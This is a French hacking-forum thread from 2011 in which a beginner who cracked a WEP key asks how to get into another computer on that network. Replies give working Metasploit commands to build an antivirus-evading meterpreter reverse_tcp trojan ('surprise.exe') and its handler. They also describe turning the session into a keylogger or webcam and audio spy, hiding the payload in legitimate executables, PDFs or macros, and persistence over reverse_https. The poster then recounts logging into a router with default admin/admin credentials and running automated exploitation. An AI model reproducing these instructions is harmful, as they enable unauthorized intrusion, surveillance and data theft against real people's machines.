Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-01-2011 15:38:55

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Accéder à un PC du réseau

Bonjour!

J'aimerai accéder(par exemple à son dossier ''mes documents'') à un ordinateur connecté sur le réseau (clé wep trouvé). Est-ce possible malgré la possibilité d'un firewall? Est-il au moins possible d'accéder au documents partagés(comme sur windows) via BT4-r2?

Merci big_smile


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-01-2011 17:38:39

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Accéder à un PC du réseau

Salut,vois du coté de metasploit pour sa wink

Hors Ligne

#3 17-01-2011 18:04:48

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Accéder à un PC du réseau

Merci! Je commence dans le monde des réseaux...je dois donc me familiariser avec les termes et logiciels smile Je fais une recherche! Des conseils de tutos?


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#4 17-01-2011 19:00:44

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Accéder à un PC du réseau

cherche sur le forum
ya tout ce qui faut


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

#5 17-01-2011 19:29:36

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Accéder à un PC du réseau

La présence du firewall t’empêcheras de te connecter sur un port, mais y a pas que lui, les boucliers anti-réseaux des anti-virus ne laissent rien passer n’ont plus si tu auras réussi à contourner le firewall, mais ce n’est pas une mince affaire.

Hors Ligne

#6 17-01-2011 19:39:56

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Accéder à un PC du réseau

La présence du firewall t’empêcheras de te connecter sur un port, mais y a pas que lui, les boucliers anti-réseaux des anti-virus ne laissent rien passer n’ont plus si tu auras réussi à contourner le firewall, mais ce n’est pas une mince affaire.

J'ai pris les informations pour travailler avec nessus et metasploit. Pour ce qui est du firewall, en faisant un reverse tcp avec meterpreter... ça n'empêche pas le firewall de détecter?


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#7 17-01-2011 20:00:05

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : Accéder à un PC du réseau

Reyals a écrit :

J'ai pris les informations pour travailler avec nessus et metasploit. Pour ce qui est du firewall, en faisant un reverse tcp avec meterpreter... ça n'empêche pas le firewall de détecter?

La plus part des parfeux ne bloque pas les connection sortante donc t'auras pas beaucoup de soucis de son point de vue la smile.


fete.gif

Hors Ligne

#8 17-01-2011 20:38:11

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Accéder à un PC du réseau

Le tous 'cest de trouver le bon exploit ou auxilliaire en fonction de l'ordinateur ciblé en question, vaut mieux préparer plusieurs attaques avant de se lancer wink

Hors Ligne

#9 17-01-2011 20:38:34

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Accéder à un PC du réseau

Merci raylook, c'est bien ce que je pensais smile Je vais tester cela quand je vais pouvoir réaccéder à mon BT, pour l'instant je dois rester sur Windows parce que je suis en train de créer un mega-dico!
En passant, est-ce qu'il y a une façon rapide de connaitre l'ip de l'autre ordinateur sur le réseau via BT4 (sans aller faire ipconfig sur le sien lol)?
Merci


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#10 17-01-2011 20:53:16

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Accéder à un PC du réseau

Accède a l'interface du réseau smile

arp -a

tu choppe l'ip de la box,tu la rentre dans ton naviguateur et c'est bon,en plus de voir l'ip des autres ordinateurs tu verra la configuration de la box...ce qui peut etre utile wink

Hors Ligne

#11 17-01-2011 20:56:13

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : Accéder à un PC du réseau

Reyals a écrit :

Merci raylook, c'est bien ce que je pensais smile Je vais tester cela quand je vais pouvoir réaccéder à mon BT, pour l'instant je dois rester sur Windows parce que je suis en train de créer un mega-dico!
En passant, est-ce qu'il y a une façon rapide de connaitre l'ip de l'autre ordinateur sur le réseau via BT4 (sans aller faire ipconfig sur le sien lol)?
Merci

Lol , avant tout pour attaquer il te faut une cible tongue une adresse ip dans ton cas , si tu n'a pas d'adresse ip il faut en trouver pour cela plusieurs méthode :
Passive : avec wireshark par exemple , en gros tu analyse le trafic pour voir les ips qui communiquent (arp , broadcast si switch)
Active : en utilisant nmap , tu scannes le sous reseau pour trouver les machines actives Scann Lan


fete.gif

Hors Ligne

#12 17-01-2011 21:03:32

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Accéder à un PC du réseau

Merci à vous deux!:D


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#13 17-01-2011 21:07:31

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Accéder à un PC du réseau

On est en train de s'égarer, là reprenons smile
* Il est possible d'accéder aux dossiers partagés d'une machine Windows, le protocole s'appelle Samba (implémentation du SMB de Windows). Pour l'utiliser sous BT4 c'est simple, tu ouvres Konqueror (le navigateur) et tu entres une adresse du type smb://192.168.1.42 (où la machine [...].42 a des dossiers partagés évidemment). Il faut que le pare-feu de la machine autorise les dossiers partagés.

* Pour trouver les adresses d'autres ordis sur le réseau, presque tout a été dit. J'ajoute quand même le programme netdiscover qui fonctionne pas mal wink Nmap c'est bien aussi (mais moins discret), penser à utiliser l'option "-PN" si les autres ordis sont configurés pour ne pas répondre aux ping's

* Pour accéder à tous les dossiers (y compris ceux qui ne sont pas partagés), effectivement on peut passer par Metasploit (c'est le plus simple). Tu peux faire soit un reverse shell (avoir une invite de commande sur le système-cible) soit un meterpreter (qui est un shell beaucoup plus évolué et... intéressant big_smile)
Scénario de base :
- tu crées ton trojan en reverse_tcp avec msfpayload :

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=12345 X > ~/surprise.exe
#remplacer LHOST par l'IP de la machine attaquante

Tu te retrouves avec ton "surprise.exe" sur le bureau, qui devra être exécuté sur la machine-cible.
- d'abord tu te prépares à réceptionner l'appel du trojan :

./msfconsole # puis dans la console tu tapes les commandes suivantes : 
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 12345
exploit

[EDIT] commande "set PAYLOAD windows/meterpreter/reverse_tcp" rajoutée après essai de Necromoine, au temps pour moi
- ensuite tu exécutes ton surprise.exe depuis la machine victime (dans ce scénario simple, désactive l'antivirus sinon il risque de gueuler, on traitera ça plus tard)
- de retour sur l'attaquant, tu devrait le voir s'agiter et finalement te proposer un [c]meterpreter>[/c] ; là, c'est Disneyland tu peux faire plein de choses sur la machine, tape "help" pour avoir un aperçu. Les commandes "cd, download, upload, edit, rm (ou del, chai plus)" te permettront de jouer avec tous les fichiers de la cible, mais c'est une infime fraction des possibilités. L'utilisation de scripts peut transformer un meterpreter en keylogger, aspirateur de mots de passe, VNC (tu vois ce que la victime fait), espion audio/video,... Y a moyen de rire wink

Pour le problème de l'antivirus, tu peux utiliser msfencode après msfpayload pour "maquiller" ton trojan et essayer de le faire éviter les antivirus. La commande deviendrait donc :

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=12345 R | ./msfencode -t exe -o surprise.exe -e x86/shikata_ga_nai -c 10

Y a plein de variantes possibles pour ne pas devoir exécuter le trojan "à la main", comme l'exploitation de failles Windows (ce sera pour un autre jour) ou intégrer le code du trojan dans un programme "sain" et habituel (genre la calculatrice ou MS Word) et attendre que la victime (humaine) exécute ce programme sain pour avoir un retour de session. Il y a aussi toute la partie subtile de la persistance, pour que le trojan "survive" à un reboot. Bref, t'as de quoi potasser smile

Quelques liens :
--> Metasploit Payloads - msfpayload
--> Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus
--> Msfencode a Msfpayload Into An Existing Executable

Ca va pour les bases ? wink

Hors Ligne

#14 17-01-2011 22:54:13

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Accéder à un PC du réseau

Merci pour tes précieuses explications!

Ca va pour les bases ?

Depuis hier matin, j'ai installé BT4 sur live USB, cracké une clé wep, réussi un handshake et appris comment jouer avec nessus et metasploit! Alors, je suis entièrement satisfait de mes débuts! Il faut dire que les tutos et les renseignements sur le forum aident grandement! Merci à toute l'équipe du site big_smile


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#15 18-01-2011 17:46:31

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : Accéder à un PC du réseau

Antares, merci pour ton message qui m'a fait découvrir quelques chose (ah ?)
Et oui, je ne pensais pas qu'il était possible de crée un reverse_tcp dans une exe qu'il faudrait que la victime éxécute, j'était persuader qu'il fallait absolument une faille dans Windows.
En effet, je suis actuellement bloqué sur Metasploi  ans Co parce que je ne trouve aucun faille sur Windows Xp qui me sert de pot de miel à virus (un vieux pc fait l'affaire), ce que je ne comprend d'ailleur pas, car pas d'antivirus, pas de par feu windows mais les mises à jours sont faites par contre.
Mais la tu parle d'une IP local, mais est-ce possible de faire ca sur une IP connectée à un autre réseau ? (en évitant le filtrage du modem bien sur)
Hs : quel est le "meilleur" scanner de vulnérabilité ? Car je ne suis pas satisfait de Nessus, et j'ai souvent des problèmes avec.

Dernière modification par necromoine (18-01-2011 17:51:06)

Hors Ligne

#16 18-01-2011 18:08:01

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Accéder à un PC du réseau

Les possibilités de Metasploit sont énormes en fait, et dépassent largement l'exploitation de failles (même si ça reste le meilleur vecteur d'infection). En vrac, tu peux :
- créer un simple EXE que tu fais exécuter par la victime (Social Engineering in da place, intéressant avec l'autorun des USB)
- injecter le code malicieux dans un EXE ou une DLL (!!) normalement sain(e), et dès quil/elle est appelée boum c'est Disneyland
- intégrer toujours le même code dans une page web sous forme d'applet Java (que la victime doit accepter)
- intégrer le code dans un PDF piégé (implique qu'Adobe Reader n'est pas à jour), cfr. Social Engineering Toolkit
- intégrer le code sous forme de macro VisualBasic dans un fichier MS Office (il faut que la victime accepte les macros)
- et j'en passe ...
Il y a aussi plein de payloads (= charge utile) disponibles, qui vont d'une simple console à Meterpreter (miam !) en passant par la création d'un utilisateur sur le système-victime et/ou l'activation du bureau à distance. Autant de possibilités très intéressantes smile

Bien évidemment tu peux utiliser des IP distantes (sur le net) lors de la confection du payload, si tu es en reverse_tcp tu passeras à travers le firewall de la victime (grand ouvert pour les connexions sortantes) il faut juste que ton modem a toi ait un NAT bien configuré par rapport au LPORT choisi.
Tu as également un payload meterpreter reverse_tcp_dns qui permet d'utiliser une URL plutôt qu'une adresse IP et donc régler le problème des IP dynamiques, sans oublier son évolution reverse_https qui protège le tout en SSL (un malware qui tient à sa vie privée ! tongue) et permet de passer à travers des proxys,...
Plus d'infos sur ces 2 derniers :
--> Persistent Meterpreter over Reverse HTTPS
--> Metasploit & Set - La percée du meterpreter by raz0r

En vrac sur la fin :
- ce sont principalement les mises-à-jour et patchs qui permettent de corriger les failles utilisées par Metasploit, l'antivirus est là en seconde ligne mais n'empêchera pas l'exploitation d'un Buffer Overflow sur un service vulnérable => c'est normal que ta cible patchée fasse de la résistance wink
- scanner de failles, je n'y connais pas grand chose. Metasploit intègre quelques modules (mais je les trouve un peu compliqués à utiliser) et tu peux regarder du côté d'OpenVAS (intégré à BT4 normalement) qui est le petit frère OpenSource de Nessus apparu après que ce dernier aie changé de licence

Hors Ligne

#17 18-01-2011 19:57:47

necromoine
Membre Radioactif
Inscription : 29-11-2010
Messages : 88

Re : Accéder à un PC du réseau

Merci beaucoup, j'ai essayé de faire le .Exe, mais quand je lance "exploit", j'ai le message d'erreur suivant :
[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.

Si vous voulez qui je crée un nouveau sujet, pas de probleme.

Hors Ligne

#18 18-01-2011 20:10:08

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Accéder à un PC du réseau

Ouais, j'ai tapé les commandes de tête et j'en ai oublié une dans la [c]msfconsole[/c] :S

Juste après le use [c]multi/handler[/c], il faut lui dire à quel payload il doit s'attendre. Donc tu mets le même qu'à la création de l'EXE, ça donne ceci :

./msfconsole # puis dans la console tu tapes les commandes suivantes : 
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.42 #remplace par l'adresse IP de l'attaquant, donc celle de la machine Metasploit
set LPORT 12345
exploit

(je suis pas sûr qu'il faut préciser le LHOST, mais on sait jamais...)

Si ça ne marche toujours pas ou que tu veux plus de détails, ça serait mieux de créer un nouveau sujet oui, parce que je sens qu'on ne fait que commencer ici wink

[EDIT] La discussion continue ici --> msfpayload

Hors Ligne

#19 19-01-2011 04:00:25

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Accéder à un PC du réseau

Puisque vous m'avez grandement aidé dans ce topic, je vais vous faire part de ma séance de hacking d'aujourd'hui. J'ai voulu mettre en pratique les informations de ce présent topic. Alors, j'entre arp -a et j'obtiens le ip du réseau que je met sous konqueror... alors la, il me demande un identifiant et un mot de passe ?_?
Je fais la fameuse combinaison admin/admin et bonjour je suis entré! Je trouve le ip du 2e ordinateur. Je suis maintenant près! Je fais mes petites manipulations consoles pour rendre opérationnel nessus (création d'un user etc...) et je démarre (nessus &) j'entre mon identifiant et mot de passe pour finalement me faire dire : Could not open a connection to localhost. Après une légère recherche, j'apprends que je dois entrer sudo/etc/init.d/nessusd start avant, je l'essaie et tout est ok! Je fais la recherche de faille avec nessus, il en trouve une que je sauvegarde! J'ouvre metasploit, et le tuto me disait de faire db_create /root/database.db, sauf que cette magnifique ligne ne fonctionne pas O_O! Après plusieurs recherches sur des sites de nos collègues anglophones je trouve que je devais faire: db_driver sqlite3 avant... et la tout fonctionne, j'étais dans une joie folle, mais éphémère lorsque metasploit après la commande db_autopwn -t -x ne trouve aucun exploit!!!!!!!!!!!

Voici ma saga de la journée!


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#20 19-01-2011 11:26:04

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Accéder à un PC du réseau

Ah ben ça va, je vois que tu progresses pas mal smile Juste une petite remarque au passage : sous BT4, comme tu es en root par défaut, tu n'as jamais besoin du "sudo". Mais c'est un détail wink

Pour ce qui est de la fausse joie, il faut savoir que c'est (très) difficile de trouver une faille sur un système correctement patché (=> à jour), mais ça l'est encore plus si Metasploit lui-même n'est pas à jour !
Donc avant de faire toutes ces attaques, il faut le mettre à jour avec la commande suivante (connexion internet requise) :

svn up /pentest/exploits/framework3

Y a peut-être une mise à jour de Nessus à faire aussi, mais là je connais pas la commande hmm

Je dis pas que d'un coup tu réussiras à exploiter une faille, mais t'auras déjà plus de chance avec les derniers exploits publiés wink

Hors Ligne

#21 19-01-2011 15:56:40

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Accéder à un PC du réseau

Salut! Pour mettre metasploit à jour j'ai fait comme ceci:

cd /pentest/exploits/framework3
svn update

C'est équivalent? J'avais vérifié ma version en tapant simplement version, mais je ne l'ai pas prise en note (je suis sous windows en ce moment)


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#22 19-01-2011 19:43:22

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Accéder à un PC du réseau

Salut, il y a aussi 

cd /pentest/exploits/framework3
./msfupdate

Hors Ligne

#23 20-01-2011 15:42:41

Reyals
Membre Radioactif
Inscription : 08-01-2011
Messages : 74

Re : Accéder à un PC du réseau

D'accord, merci! ^_^


Soyons réaliste, exigeons l'impossible ! [Ché Guevara]

Hors Ligne

#24 20-01-2011 21:15:55

tobouda
Banni(e)
Inscription : 19-01-2011
Messages : 5

Re : Accéder à un PC du réseau

salut!
j'aimerai savoir dans quel site télécharger le arp spoofing?

Hors Ligne

#25 20-01-2011 21:33:41

konik
Membre d'Or
Lieu : 127.0.0.1
Inscription : 15-12-2010
Messages : 419

Re : Accéder à un PC du réseau

L'arp spoofing c'est pas un logiciel c'est une technique


$! \/0(_)$ |*0uv32 1!r3 [3c!, c'357 q(_)3 v0(_)$ 4v32 vr4!|\/|3n7 83$0!n d3 |\|!qu3r

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
9 1721 20-11-2016 03:45:46 par richie
Perte de réseau wifi par BrunoB
4 259 12-09-2016 17:20:15 par BrunoB
2 377 08-08-2016 22:49:22 par Olympe
4 253 28-07-2016 16:41:30 par rsl
13 814 16-06-2016 20:04:23 par ✞θ!ก∃℧┌

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]